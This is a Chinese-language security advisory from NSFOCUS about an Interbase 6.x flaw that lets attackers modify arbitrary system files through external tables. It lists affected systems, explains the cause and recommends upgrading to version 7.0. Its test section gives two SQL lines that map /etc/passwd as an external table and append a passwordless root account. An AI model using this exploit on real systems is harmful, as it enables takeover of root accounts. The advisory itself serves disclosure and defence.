安全研究

安全漏洞
Interbase外部表文件校验操作漏洞

发布日期:2003-04-05
更新日期:2003-04-11

受影响系统:
Borland/Inprise Interbase 6.5
Borland/Inprise Interbase 6.4
Borland/Inprise Interbase 6.0
    - Cobalt Qube 3.0
    - Debian Linux 2.2
    - HP HP-UX 11.0
    - Mandrake Linux 8.2
    - Mandrake Linux 8.1
    - Mandrake Linux 8.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000
    - RedHat Linux 7.3
    - RedHat Linux 7.2
    - RedHat Linux 7.1
    - RedHat Linux 7.0
    - RedHat Linux 6.2
    - Sun Solaris 8.0
    - SuSE Linux 8.0
    - SuSE Linux 7.3
    - SuSE Linux 7.2
    - SuSE Linux 7.1
    - SuSE Linux 7.0
    - SuSE Linux 6.4
不受影响系统:
Borland/Inprise Interbase 7.0
描述:
BUGTRAQ  ID: 7291

Interbase是一款由Borland公司开发和维护的数据库软件,可使用在多种Unix和Linux操作系统。

Interbase当建立或更改外部数据库时缺少充分检查,远程或本地攻击者可以利用这个漏洞破坏任意系统文件。

Interbase支持外部文件来存储数据,数据存储以raw格式存储并没有任何访问限制,如果指定的外部文件存储,就会以R/W追加方式打开文件。通过建立外部表文件形式,可以修改系统上可访问的系统文件,因为一般情况下默认以System (Windows)或root(Linux) 帐户运行,可以修改系统任意文件。

<*来源:Kotala Zdenìk (Zdenek.Kotala@Mius.cz
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104957649623733&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Kotala Zdenìk (Zdenek.Kotala@Mius.cz)提供了如下测试方法:

create table test external '/etc/passwd' (id char(80));
insert into test values('r00t::0:0:root:/root:/bin/bash');

建议:
厂商补丁:

Borland/Inprise
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到Interbase 7.0版本:

http://www.borland.com/interbase/

浏览次数:3365
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障